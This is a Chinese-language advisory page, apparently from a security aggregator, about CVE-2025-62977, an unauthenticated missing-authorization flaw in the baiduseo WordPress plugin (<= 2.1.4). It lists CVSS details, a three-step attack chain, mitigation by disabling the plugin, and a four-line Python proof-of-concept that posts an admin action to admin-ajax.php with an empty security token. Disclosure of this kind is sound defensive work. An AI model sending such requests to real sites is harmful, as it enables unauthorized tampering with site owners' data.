CVE-2025-62977 WordPress baiduseo插件缺失授权漏洞

披露日期: 2025-10-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62977

漏洞类型

缺失授权（Missing Authorization/Broken Access Control）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

沃之涛百度站长SEO合集WordPress插件(baiduseo)

漏洞概述

该漏洞存在于WordPress插件baiduseo中，由于访问控制机制不当，攻击者可在未经认证的情况下访问本应受限的功能，可能导致SEO数据被篡改或敏感信息泄露。

技术细节

漏洞源于baiduseo插件的权限验证缺失，攻击者利用未受保护的API端点直接访问管理功能。

攻击链分析

STEP 1

识别目标WordPress站点及其baiduseo插件版本

STEP 2

构造恶意请求访问受限管理功能

STEP 3

成功执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
url = 'http://target.com/wp-admin/admin-ajax.php'
data = {'action': 'baiduseo_admin_action', 'security': ''}
response = requests.post(url, data=data)

影响范围

baiduseo <= 2.1.4

防御指南

临时缓解措施

暂时禁用baiduseo插件，等待官方安全更新

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表